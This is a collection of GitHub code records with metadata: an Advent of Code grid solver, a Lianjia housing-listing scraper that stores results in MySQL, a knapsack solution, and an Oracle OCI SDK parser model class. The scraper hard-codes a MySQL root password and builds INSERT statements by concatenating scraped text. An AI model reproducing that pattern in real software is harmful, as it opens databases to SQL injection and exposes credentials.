enumerate(row)]\n for i, row in enumerate(grid)]\n\ndef calculate_resource_value(grid):\n num_wooded = count2d(grid, Square.is_trees)\n num_lumberyards = count2d(grid, Square.is_lumberyard)\n return num_wooded * num_lumberyards\n\ndef count2d(grid, fun):\n return sum(count(row, fun) for row in grid)\n\ndef count(enumerable, fun):\n return sum(1 for value in enumerable if fun(value))\n\ndef create_grid_string(grid):\n return '\\n'.join(''.join(square.to_char() for square in row)\n for row in grid)\n\n################################################################################\n# Input\n################################################################################\ndef get_input():\n return [parse_line(line.strip()) for line in sys.stdin.readlines()]\n\ndef parse_line(line):\n return [Square.from_char(char) for char in line]\n\n################################################################################\n# Run\n################################################################################\ndef main():\n grid = get_input()\n print(solve(grid))\n\nif __name__ == '__main__':\n main()\n","repo_name":"HarrisonMc555/adventofcode","sub_path":"2018/day18b.py","file_name":"day18b.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1551555543","text":"import bs4\r\nimport urllib.request\r\nimport urllib.parse\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport time\r\nimport pymysql\r\n\r\n\r\n\r\n\r\nclass second_hand_house(object):\r\n url = 'https://nj.lianjia.com/ershoufang/pg'\r\n data_sum=0\r\n\r\n def __init__(self,start_page,end_page):\r\n self.start_page = start_page\r\n self.end_page = end_page\r\n def database_connectionAnd_create(self):\r\n mysql_host = 'the_second_house'\r\n mysql_name = 'localhost'\r\n mysql_user = 'root'\r\n mysql_port = 3306\r\n mysql_password = '1025058706zfr'\r\n dbconn = pymysql.connect(mysql_name, mysql_user, mysql_password, mysql_host, charset='utf8')\r\n cursor = dbconn.cursor()\r\n #cursor.execute('create table student(id int PRIMARY KEY NOT NULL,coummunity_name varchar(50),location varchar(50),total_price float(5,2),unit_price float(5,2),house_type varchar(50),floor varchar(20))')\r\n cursor.execute('create table inf(id int PRIMARY KEY NOT NULL,coummunity_name varchar(50),location varchar(50),total_price float(5,2),unit_price float(5,2),house_type varchar(50),floor varchar(20),construction_area varchar(20),house_structure varchar(50),inner_area varchar(20),building_type varchar(20),house_orientation varchar(20),building_structure varchar(20),renovation varchar(20),ladder_ratio varchar(20),elevator varchar(20),year_of_property_rights varchar(20))')\r\n def database_connectionAnd_insert(self,id_,community_name,location,total_price,unit_price,house_type,floor,construction_area,house_structure,inner_area,building_type,house_orientation,building_structure,renovation,ladder_ratio,elevator,year_of_property_rights):\r\n\r\n mysql_host = 'the_second_house'\r\n mysql_name = 'localhost'\r\n mysql_user = 'root'\r\n mysql_port = 3306\r\n mysql_password = '1025058706zfr'\r\n dbconn = pymysql.connect(mysql_name, mysql_user, mysql_password, mysql_host, charset='utf8')\r\n cursor = dbconn.cursor()\r\n cursor.execute('insert into inf values('+id_+',\"'+community_name+'\",\"'+location+'\",\"'+total_price+'\",\"'+unit_price+'\",\"'+house_type+'\",\"'+floor+'\",\"'+construction_area+'\",\"'+house_structure+'\",\"'+inner_area+'\",\"'+building_type+'\",\"'+house_orientation+'\",\"'+building_structure+'\",\"'+renovation+'\",\"'+ladder_ratio+'\",\"'+elevator+'\",\"'+year_of_property_rights+'\")')\r\n cursor.close()\r\n dbconn.commit()\r\n dbconn.close()\r\n def database_insert(self):pass\r\n\r\n\r\n def parse_content_detail(self,content):\r\n '''\r\n with open('contain.html','wb') as fp:\r\n fp.write(content)\r\n\r\n '''\r\n\r\n global sum\r\n the_whole_information = {\r\n '小区名称': '',\r\n '小区地点': '',\r\n '总价': '',\r\n '单价': '',\r\n '房屋户型': '',\r\n '所在楼层': '',\r\n '建筑面积': '',\r\n '户型结构': '',\r\n '套内面积': '',\r\n '建筑类型': '',\r\n '房屋朝向': '',\r\n '建筑结构': '',\r\n '装修情况': '',\r\n '梯户比例': '',\r\n '配备电梯': '',\r\n '产权年限': '',\r\n #'户型区间信息': {'客厅': '', '卧室A': '', '卧室B': '', '卧室C': '', '厨房': '', '卫生间': '', '阳台': '', }\r\n\r\n }\r\n soup = BeautifulSoup(content,\"lxml\")\r\n #print(type(soup))\r\n\r\n\r\n\r\n #小区名称\r\n\r\n\r\n div_community_name = soup.find('div',class_='communityName')\r\n realname = div_community_name.find('a',class_='info')\r\n community_name =realname.string\r\n #print(community_name)\r\n the_whole_information['小区名称']=community_name\r\n\r\n\r\n div_area = soup.find('div',class_=\"aroundInfo\")\r\n\r\n\r\n\r\n #小区地点\r\n\r\n\r\n #print(div_area)\r\n area = div_area.find('span',class_='info')\r\n area_information=area.text\r\n #print(area.text)\r\n #print(area)\r\n s=\"\".join(area.text.split())\r\n #print(s)\r\n\r\n the_whole_information['小区地点']=s\r\n\r\n\r\n '''\r\n area_detail = area.find_all('a',target='_blank')\r\n \r\n area_information = ''\r\n for label in range(0,len(area_detail)):\r\n area_information=area_information+' '+area_detail[label].string\r\n print(area_information)\r\n \r\n '''\r\n\r\n\r\n\r\n #房价\r\n\r\n div_price = soup.find('div',class_='price')\r\n #print(div_price)\r\n span_total_price = div_price.find('span',class_='total')\r\n total_price = span_total_price.string+'万人民币'\r\n #print(total_price)\r\n span_unit_value =soup.find('span',class_='unitPriceValue')\r\n unit_price = span_unit_value.text\r\n #print(unit_price)\r\n\r\n the_whole_information['总价']=total_price\r\n the_whole_information['单价']=unit_price\r\n\r\n\r\n\r\n #房子信息\r\n\r\n div_house_content= soup.find('div',class_='base')\r\n house_info_dir={\r\n }\r\n for i in div_house_content.find_all('li'):\r\n #print(i)\r\n string=str(i)\r\n pattern = re.compile(r'
  • (.*?).*?
  • ', re.S)\r\n result_type = pattern.findall(string)\r\n pattern = re.compile(r'
  • .*?(.*?)
  • ', re.S)\r\n result_content = pattern.findall(string)\r\n di={\r\n result_type[0]:result_content[0]\r\n }\r\n house_info_dir.update(di)\r\n #print(type(result_content[0]))\r\n #print(house_info_dir)\r\n\r\n #div_intro = soup.find('div',class_='introContent showbasemore')\r\n #print(div_intro)\r\n # the_whole_information['']\r\n #if '' in house_info_dir:\r\n #else: the_whole_information['']='暂无数据'\r\n\r\n\r\n if '房屋户型' in house_info_dir:the_whole_information['房屋户型'] = house_info_dir['房屋户型']\r\n else: the_whole_information['房屋户型']='暂无数据'\r\n\r\n if '所在楼层' in house_info_dir:the_whole_information['所在楼层'] = house_info_dir['所在楼层']\r\n else: the_whole_information['所在楼层']='暂无数据'\r\n\r\n if '建筑面积' in house_info_dir:the_whole_information['建筑面积'] = house_info_dir['建筑面积']\r\n else: the_whole_information['建筑面积']='暂无数据'\r\n\r\n\r\n if '户型结构' in house_info_dir:the_whole_information['户型结构'] = house_info_dir['户型结构']\r\n else :the_whole_information['户型结构']='暂无数据'\r\n\r\n if '套内面积' in house_info_dir:the_whole_information['套内面积'] = house_info_dir['套内面积']\r\n else: the_whole_information['套内面积'] = '暂无数据'\r\n\r\n if '建筑类型' in house_info_dir:the_whole_information['建筑类型'] = house_info_dir['建筑类型']\r\n else: the_whole_information['建筑类型']='暂无数据'\r\n\r\n if '房屋朝向' in house_info_dir:the_whole_information['房屋朝向'] = house_info_dir['房屋朝向']\r\n else: the_whole_information['房屋朝向']='暂无数据'\r\n\r\n if '建筑结构' in house_info_dir:the_whole_information['建筑结构'] = house_info_dir['建筑结构']\r\n else: the_whole_information['建筑结构']='暂无数据'\r\n\r\n if '装修情况' in house_info_dir:the_whole_information['装修情况'] = house_info_dir['装修情况']\r\n else: the_whole_information['装修情况'] = '暂无数据'\r\n\r\n if '梯户比例' in house_info_dir:the_whole_information['梯户比例'] = house_info_dir['梯户比例']\r\n else: the_whole_information['梯户比例']='暂无数据'\r\n\r\n if '配备电梯' in house_info_dir:the_whole_information['配备电梯'] = house_info_dir['配备电梯']\r\n else: the_whole_information['配备电梯']='暂无数据'\r\n\r\n if '产权年限' in house_info_dir:the_whole_information['产权年限'] = house_info_dir['产权年限']\r\n else: the_whole_information['产权年限']='暂无数据'\r\n\r\n house_intro_dir = {\r\n\r\n\r\n }\r\n\r\n\r\n div_base = soup.find_all('div',class_='baseattribute clear')\r\n '''\r\n for i in div_base:\r\n string = str(i)\r\n #print(i)\r\n pattern = re.compile(r'
    (.*?)
    ',re.S)\r\n result_type = pattern.findall(string)\r\n print(result_type[0])\r\n pattern = re.compile(r'
    (.*?)
    ',re.S)\r\n result_content = pattern.findall(string)\r\n re_left = result_content[0].lstrip()\r\n re_right = re_left.rstrip()\r\n\r\n\r\n house_in_dir={\r\n result_type[0]:re_right\r\n\r\n }\r\n house_intro_dir.update(house_in_dir)\r\n #print(house_intro_dir[result_type[0]])\r\n\r\n '''\r\n #print(the_whole_information['小区名称'])\r\n #print(house_info_dir['户型结构'])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n #户型分间\r\n '''\r\n div_des = soup.find('div',class_='des')\r\n if len(div_des):\r\n div_apartment = div_des.find_all('div',class_='list')\r\n #print(div_apartment[0])\r\n #print(div_apartment)\r\n div_list = div_apartment[0].find_all('div',class_='row')\r\n dir_row = {\r\n\r\n\r\n }\r\n #print(div_list)\r\n\r\n room_list = []\r\n for i in div_list:\r\n div_row = i.find_all('div',class_='col')\r\n #print(div_row)\r\n\r\n room_list_1 = []\r\n #这里有问题!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n for j in div_row:\r\n\r\n string = str(j)\r\n pattern =re.compile(r'
    (.*?)
    ',re.S)\r\n re_row = pattern.findall(string)\r\n #print(re_row[0])\r\n room_list_1.append(re_row[0])\r\n room_list.append(room_list_1)\r\n for i in div_list:\r\n div_row = i.find_all('div',class_='col')\r\n #print(div_row)\r\n\r\n room_list_1 = []\r\n #这里有问题!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n for j in div_row:\r\n\r\n string = str(j)\r\n pattern =re.compile(r'
    (.*?)
    ',re.S)\r\n re_row = pattern.findall(string)\r\n #print(re_row[0])\r\n room_list_1.append(re_row[0])\r\n room_list.append(room_list_1)\r\n #print(room_list)\r\n #输入信息\r\n '''\r\n '''the_whole_information['户型区间信息']['客厅']='面积:'+room_list[0][1]+' 方向 :'+room_list[0][2]+'窗户:'+room_list[0][3]\r\n the_whole_information['户型区间信息']['卧室A'] = '面积:' + room_list[1][1] + ' 方向 :' + room_list[1][2] + '窗户:' + room_list[1][3]\r\n the_whole_information['户型区间信息']['卧室B'] = '面积:' + room_list[2][1] + ' 方向 :' + room_list[2][2] + '窗户:' + room_list[2][3]\r\n the_whole_information['户型区间信息']['卧室C'] = '面积:' + room_list[3][1] + ' 方向 :' + room_list[3][2] + '窗户:' + room_list[3][3]\r\n the_whole_information['户型区间信息']['厨房'] = '面积:' + room_list[4][1] + ' 方向 :' + room_list[4][2] + '窗户:' + room_list[4][3]\r\n the_whole_information['户型区间信息']['卫生间'] = '面积:' + room_list[5][1] + ' 方向 :' + room_list[5][2] + '窗户:' + room_list[5][3]\r\n the_whole_information['户型区间信息']['阳台'] = '面积:' + room_list[6][1] + ' 方向 :' + room_list[6][2] + '窗户:' + room_list[6][3]\r\n \r\n '''\r\n\r\n\r\n '''\r\n #---------------------------------------------------------将roomlist内容装入the_whole_information里--------------------------------------------------------------------------\r\n\r\n\r\n\r\n\r\n\r\n\r\n else:\r\n room_list=['无户型分间信息']\r\n the_whole_information['户间区间信息']=room_list[0]\r\n #print(room_list[0])\r\n '''\r\n\r\n\r\n\r\n #print(type(the_whole_information))\r\n print(\"正在爬取\"+the_whole_information[\"小区名称\"]+\"的信息\")\r\n #print(type(str(the_whole_information['小区名称'])))\r\n self.database_connectionAnd_insert(str(self.data_sum),str(the_whole_information['小区名称']),str(the_whole_information['小区地点']),str(the_whole_information['总价']),str(the_whole_information['单价']),str(the_whole_information['房屋户型']),str(the_whole_information['所在楼层']),str(the_whole_information['建筑面积']),str(the_whole_information['户型结构']),str(the_whole_information['套内面积']),str(the_whole_information['建筑类型']),str(the_whole_information['房屋朝向']),str(the_whole_information['建筑结构']),str(the_whole_information['装修情况']),str(the_whole_information['梯户比例']),str(the_whole_information['配备电梯']),str(the_whole_information['产权年限']))\r\n self.data_sum+=1\r\n #print(the_whole_information['小区名称'])\r\n #print(house_info_dir['户型结构'])\r\n\r\n\r\n\r\n\r\n #exit()\r\n\r\n\r\n\r\n\r\n\r\n #交易属性\r\n\r\n '''\r\n \r\n div_house_trade = soup.find('div',class_='transaction')\r\n house_trade_dir={\r\n\r\n\r\n\r\n }\r\n div_house_trade_deep = div_house_trade.find('div',class_='content')\r\n\r\n for i in div_house_trade_deep.find_all('li'):\r\n print(i)\r\n string = str(i)\r\n pattern = re.compile(r'(.*?)',re.S)\r\n result_attribute = pattern.findall(string)\r\n print(result_attribute[0])\r\n pattern = re.compile(r'(.*?)', re.S)\r\n result_attribute_value = pattern.findall(string)\r\n print(result_attribute_value[0])\r\n \r\n tr_dir = {\r\n result_attribute[0]:result_attribute_value[0]\r\n\r\n }\r\n house_trade_dir.update(tr_dir)\r\n print(house_trade_dir)\r\n \r\n '''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n '''\r\n result= div_house_content.find_all('li')[0]\r\n\r\n #result = div_house_content.find_all(text=re.compile(r'.*?(.*?)',re.S))\r\n\r\n #print(str(result))\r\n pattern1 = re.compile(r'
  • (.*?).*?
  • ',re.S)\r\n result_type = pattern1.findall(str(result))\r\n print(result_type[0])\r\n pattern = re.compile(r'
  • .*?(.*?)
  • ',re.S)\r\n result_fin=pattern.findall(str(result))\r\n print(result_fin[0])\r\n \r\n '''\r\n\r\n\r\n def build_request(self,parse_url):\r\n header = {\r\n\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\r\n\r\n }\r\n request = urllib.request.Request(url=parse_url, headers=header)\r\n content = urllib.request.urlopen(request).read().decode()\r\n # with open('pg_%s.html'% page,'wb') as fp :\r\n # fp.write(content)\r\n return content\r\n\r\n\r\n def parse_content(self,content):\r\n soup = BeautifulSoup(content, 'lxml')\r\n #print(type(soup))\r\n #a_content = soup.find_all('a',class_=\"title\")\r\n #for k in a_content:\r\n #print(k.string)\r\n a_herf = soup.find_all('a',class_=\"title\")\r\n for k in a_herf:\r\n #print(type(k['href']))\r\n content = self.build_request(k['href'])\r\n parse_content = self.parse_content_detail(content)\r\n\r\n time.sleep(1)\r\n\r\n\r\n\r\n def run(self):\r\n\r\n for page in range(self.start_page,self.end_page+1):\r\n print(\"-------------crawling the %s page-----------\"% page)\r\n parse_url = self.url + str(page) +'/'\r\n # print(parse_url)\r\n content = self.build_request(parse_url)\r\n #print(content)\r\n parse_content = self.parse_content(content)\r\n time.sleep(5)\r\n\r\ndef main():\r\n\r\n\r\n start_page = int(input(\"input the start page : \"))\r\n end_page = int(input(\"input the end page : \"))\r\n spider = second_hand_house(start_page,end_page)\r\n spider.run()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Crystal-Dragon-Liu/ML_practise","sub_path":"job_of_python/ershoufang/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":15538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13115303422","text":"from sys import stdin\nn, k = map(int, stdin.readline().split())\n\narr = [[0] * (k + 1) for _ in range(n + 1)]\nfor i in range(1, n + 1):\n w, v = map(int, input().split())\n for j in range(k + 1):\n if j < w:\n arr[i][j] = arr[i - 1][j]\n else:\n arr[i][j] = max(arr[i - 1][j], arr[i - 1][j - w] + v)\n\nprint(arr[n][k])\n","repo_name":"olive-su/1day_1Algorithm","sub_path":"22.03_PS/0321_평범한_배낭.py","file_name":"0321_평범한_배낭.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31596604009","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass UnifiedAgentParser(object):\n \"\"\"\n Source parser object.\n \"\"\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"AUDITD\"\n PARSER_TYPE_AUDITD = \"AUDITD\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"CRI\"\n PARSER_TYPE_CRI = \"CRI\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"JSON\"\n PARSER_TYPE_JSON = \"JSON\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"TSV\"\n PARSER_TYPE_TSV = \"TSV\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"CSV\"\n PARSER_TYPE_CSV = \"CSV\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"NONE\"\n PARSER_TYPE_NONE = \"NONE\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"SYSLOG\"\n PARSER_TYPE_SYSLOG = \"SYSLOG\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"APACHE2\"\n PARSER_TYPE_APACHE2 = \"APACHE2\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"APACHE_ERROR\"\n PARSER_TYPE_APACHE_ERROR = \"APACHE_ERROR\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"MSGPACK\"\n PARSER_TYPE_MSGPACK = \"MSGPACK\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"REGEXP\"\n PARSER_TYPE_REGEXP = \"REGEXP\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"MULTILINE\"\n PARSER_TYPE_MULTILINE = \"MULTILINE\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"GROK\"\n PARSER_TYPE_GROK = \"GROK\"\n\n #: A constant which can be used with the parser_type property of a UnifiedAgentParser.\n #: This constant has a value of \"MULTILINE_GROK\"\n PARSER_TYPE_MULTILINE_GROK = \"MULTILINE_GROK\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new UnifiedAgentParser object with values from keyword arguments. This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.logging.models.UnifiedAgentMultilineGrokParser`\n * :class:`~oci.logging.models.UnifiedJSONParser`\n * :class:`~oci.logging.models.UnifiedAgentGrokParser`\n * :class:`~oci.logging.models.UnifiedAgentNoneParser`\n * :class:`~oci.logging.models.UnifiedAgentSyslogParser`\n * :class:`~oci.logging.models.UnifiedAgentAuditdParser`\n * :class:`~oci.logging.models.UnifiedAgentApache2Parser`\n * :class:`~oci.logging.models.UnifiedAgentRegexParser`\n * :class:`~oci.logging.models.UnifiedAgentMultilineParser`\n * :class:`~oci.logging.models.UnifiedAgentTsvParser`\n * :class:`~oci.logging.models.UnifiedAgentCriParser`\n * :class:`~oci.logging.models.UnifiedAgentApacheErrorParser`\n * :class:`~oci.logging.models.UnifiedAgentMsgpackParser`\n * :class:`~oci.logging.models.UnifiedAgentCsvParser`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param parser_type:\n The value to assign to the parser_type property of this UnifiedAgentParser.\n Allowed values for this property are: \"AUDITD\", \"CRI\", \"JSON\", \"TSV\", \"CSV\", \"NONE\", \"SYSLOG\", \"APACHE2\", \"APACHE_ERROR\", \"MSGPACK\", \"REGEXP\", \"MULTILINE\", \"GROK\", \"MULTILINE_GROK\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type parser_type: str\n\n :param field_time_key:\n The value to assign to the field_time_key property of this UnifiedAgentParser.\n :type field_time_key: str\n\n :param types:\n The value to assign to the types property of this UnifiedAgentParser.\n :type types: dict(str, str)\n\n :param null_value_pattern:\n The value to assign to the null_value_pattern property of this UnifiedAgentParser.\n :type null_value_pattern: str\n\n :param is_null_empty_string:\n The value to assign to the is_null_empty_string property of this UnifiedAgentParser.\n :type is_null_empty_string: bool\n\n :param is_estimate_current_event:\n The value to assign to the is_estimate_current_event property of this UnifiedAgentParser.\n :type is_estimate_current_event: bool\n\n :param is_keep_time_key:\n The value to assign to the is_keep_time_key property of this UnifiedAgentParser.\n :type is_keep_time_key: bool\n\n :param timeout_in_milliseconds:\n The value to assign to the timeout_in_milliseconds property of this UnifiedAgentParser.\n :type timeout_in_milliseconds: int\n\n \"\"\"\n self.swagger_types = {\n 'parser_type': 'str',\n 'field_time_key': 'str',\n 'types': 'dict(str, str)',\n 'null_value_pattern': 'str',\n 'is_null_empty_string': 'bool',\n 'is_estimate_current_event': 'bool',\n 'is_keep_time_key': 'bool',\n 'timeout_in_milliseconds': 'int'\n }\n\n self.attribute_map = {\n 'parser_type': 'parserType',\n 'field_time_key': 'fieldTimeKey',\n 'types': 'types',\n 'null_value_pattern': 'nullValuePattern',\n 'is_null_empty_string': 'isNullEmptyString',\n 'is_estimate_current_event': 'isEstimateCurrentEvent',\n 'is_keep_time_key': 'isKeepTimeKey',\n 'timeout_in_milliseconds': 'timeoutInMilliseconds'\n }\n\n self._parser_type = None\n self._field_time_key = None\n self._types = None\n self._null_value_pattern = None\n self._is_null_empty_string = None\n self._is_estimate_current_event = None\n self._is_keep_time_key = None\n self._timeout_in_milliseconds = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['parserType']\n\n if type == 'MULTILINE_GROK':\n return 'UnifiedAgentMultilineGrokParser'\n\n if type == 'JSON':\n return 'UnifiedJSONParser'\n\n if type == 'GROK':\n return 'UnifiedAgentGrokParser'\n\n if type == 'NONE':\n return 'UnifiedAgentNoneParser'\n\n if type == 'SYSLOG':\n return 'UnifiedAgentSyslogParser'\n\n if type == 'AUDITD':\n return 'UnifiedAgentAuditdParser'\n\n if type == 'APACHE2':\n return 'UnifiedAgentApache2Parser'\n\n if type == 'REGEXP':\n return 'UnifiedAgentRegexParser'\n\n if type == 'MULTILINE':\n return 'UnifiedAgentMultilineParser'\n\n if type == 'TSV':\n return 'UnifiedAgentTsvParser'\n\n if type == 'CRI':\n return 'UnifiedAgentCriParser'\n\n if type == 'APACHE_ERROR':\n return 'UnifiedAgentApacheErrorParser'\n\n if type == 'MSGPACK':\n return 'UnifiedAgentMsgpackParser'\n\n if type == 'CSV':\n return 'UnifiedAgentCsvParser'\n else:\n return 'UnifiedAgentParser'\n\n @property\n def parser_type(self):\n \"\"\"\n **[Required]** Gets the parser_type of this UnifiedAgentParser.\n Type of fluent parser.\n\n Allowed values for this property are: \"AUDITD\", \"CRI\", \"JSON\", \"TSV\", \"CSV\", \"NONE\", \"SYSLOG\", \"APACHE2\", \"APACHE_ERROR\", \"MSGPACK\", \"REGEXP\", \"MULTILINE\", \"GROK\", \"MULTILINE_GROK\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The parser_type of this UnifiedAgentParser.\n :rtype: str\n \"\"\"\n return self._parser_type\n\n @parser_type.setter\n def parser_type(self, parser_type):\n \"\"\"\n Sets the parser_type of this UnifiedAgentParser.\n Type of fluent parser.\n\n\n :param parser_type: The parser_type of this UnifiedAgentParser.\n :type: str\n \"\"\"\n allowed_values = [\"AUDITD\", \"CRI\", \"JSON\", \"TSV\", \"CSV\", \"NONE\", \"SYSLOG\", \"APACHE2\", \"APACHE_ERROR\", \"MSGPACK\", \"REGEXP\", \"MULTILINE\", \"GROK\", \"MULTILINE_GROK\"]\n if not value_allowed_none_or_none_sentinel(parser_type, allowed_values):\n parser_type = 'UNKNOWN_ENUM_VALUE'\n self._parser_type = parser_type\n\n @property\n def field_time_key(self):\n \"\"\"\n Gets the field_time_key of this UnifiedAgentParser.\n Specifies the time field for the event time. If the event doesn't have this field, the current time is used.\n\n\n :return: The field_time_key of this UnifiedAgentParser.\n :rtype: str\n \"\"\"\n return self._field_time_key\n\n @field_time_key.setter\n def field_time_key(self, field_time_key):\n \"\"\"\n Sets the field_time_key of this UnifiedAgentParser.\n Specifies the time field for the event time. If the event doesn't have this field, the current time is used.\n\n\n :param field_time_key: The field_time_key of this UnifiedAgentParser.\n :type: str\n \"\"\"\n self._field_time_key = field_time_key\n\n @property\n def types(self):\n \"\"\"\n Gets the types of this UnifiedAgentParser.\n Specify types for converting a field into another type.\n For example,\n With this configuration:\n \n @type csv\n keys time,host,req_id,user\n time_key time\n \n\n This incoming event:\n \\\"2013/02/28 12:00:00,192.168.0.1,111,-\\\"\n\n is parsed as:\n 1362020400 (2013/02/28/ 12:00:00)\n\n record:\n {\n \\\"host\\\" : \\\"192.168.0.1\\\",\n \\\"req_id\\\" : \\\"111\\\",\n \\\"user\\\" : \\\"-\\\"\n }\n\n\n :return: The types of this UnifiedAgentParser.\n :rtype: dict(str, str)\n \"\"\"\n return self._types\n\n @types.setter\n def types(self, types):\n \"\"\"\n Sets the types of this UnifiedAgentParser.\n Specify types for converting a field into another type.\n For example,\n With this configuration:\n \n @type csv\n keys time,host,req_id,user\n time_key time\n \n\n This incoming event:\n \\\"2013/02/28 12:00:00,192.168.0.1,111,-\\\"\n\n is parsed as:\n 1362020400 (2013/02/28/ 12:00:00)\n\n record:\n {\n \\\"host\\\" : \\\"192.168.0.1\\\",\n \\\"req_id\\\" : \\\"111\\\",\n \\\"user\\\" : \\\"-\\\"\n }\n\n\n :param types: The types of this UnifiedAgentParser.\n :type: dict(str, str)\n \"\"\"\n self._types = types\n\n @property\n def null_value_pattern(self):\n \"\"\"\n Gets the null_value_pattern of this UnifiedAgentParser.\n Specify the null value pattern.\n\n\n :return: The null_value_pattern of this UnifiedAgentParser.\n :rtype: str\n \"\"\"\n return self._null_value_pattern\n\n @null_value_pattern.setter\n def null_value_pattern(self, null_value_pattern):\n \"\"\"\n Sets the null_value_pattern of this UnifiedAgentParser.\n Specify the null value pattern.\n\n\n :param null_value_pattern: The null_value_pattern of this UnifiedAgentParser.\n :type: str\n \"\"\"\n self._null_value_pattern = null_value_pattern\n\n @property\n def is_null_empty_string(self):\n \"\"\"\n Gets the is_null_empty_string of this UnifiedAgentParser.\n If true, an empty string field is replaced with a null value.\n\n\n :return: The is_null_empty_string of this UnifiedAgentParser.\n :rtype: bool\n \"\"\"\n return self._is_null_empty_string\n\n @is_null_empty_string.setter\n def is_null_empty_string(self, is_null_empty_string):\n \"\"\"\n Sets the is_null_empty_string of this UnifiedAgentParser.\n If true, an empty string field is replaced with a null value.\n\n\n :param is_null_empty_string: The is_null_empty_string of this UnifiedAgentParser.\n :type: bool\n \"\"\"\n self._is_null_empty_string = is_null_empty_string\n\n @property\n def is_estimate_current_event(self):\n \"\"\"\n Gets the is_estimate_current_event of this UnifiedAgentParser.\n If true, use Fluent::EventTime.now(current time) as a timestamp when the time_key is specified.\n\n\n :return: The is_estimate_current_event of this UnifiedAgentParser.\n :rtype: bool\n \"\"\"\n return self._is_estimate_current_event\n\n @is_estimate_current_event.setter\n def is_estimate_current_event(self, is_estimate_current_event):\n \"\"\"\n Sets the is_estimate_current_event of this UnifiedAgentParser.\n If true, use Fluent::EventTime.now(current time) as a timestamp when the time_key is specified.\n\n\n :param is_estimate_current_event: The is_estimate_current_event of this UnifiedAgentParser.\n :type: bool\n \"\"\"\n self._is_estimate_current_event = is_estimate_current_event\n\n @property\n def is_keep_time_key(self):\n \"\"\"\n Gets the is_keep_time_key of this UnifiedAgentParser.\n If true, keep the time field in the record.\n\n\n :return: The is_keep_time_key of this UnifiedAgentParser.\n :rtype: bool\n \"\"\"\n return self._is_keep_time_key\n\n @is_keep_time_key.setter\n def is_keep_time_key(self, is_keep_time_key):\n \"\"\"\n Sets the is_keep_time_key of this UnifiedAgentParser.\n If true, keep the time field in the record.\n\n\n :param is_keep_time_key: The is_keep_time_key of this UnifiedAgentParser.\n :type: bool\n \"\"\"\n self._is_keep_time_key = is_keep_time_key\n\n @property\n def timeout_in_milliseconds(self):\n \"\"\"\n Gets the timeout_in_milliseconds of this UnifiedAgentParser.\n Specify the timeout for parse processing. This is mainly for detecting an incorrect regexp pattern.\n\n\n :return: The timeout_in_milliseconds of this UnifiedAgentParser.\n :rtype: int\n \"\"\"\n return self._timeout_in_milliseconds\n\n @timeout_in_milliseconds.setter\n def timeout_in_milliseconds(self, timeout_in_milliseconds):\n \"\"\"\n Sets the timeout_in_milliseconds of this UnifiedAgentParser.\n Specify the timeout for parse processing. This is mainly for detecting an incorrect regexp pattern.\n\n\n :param timeout_in_milliseconds: The timeout_in_milliseconds of this UnifiedAgentParser.\n :type: int\n \"\"\"\n self._timeout_in_milliseconds = timeout_in_milliseconds\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/logging/models/unified_agent_parser.py","file_name":"unified_agent_parser.py","file_ext":"py","file_size_in_byte":15943,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"43532045326","text":"import numpy as np\nimport pandas as pd\nimport 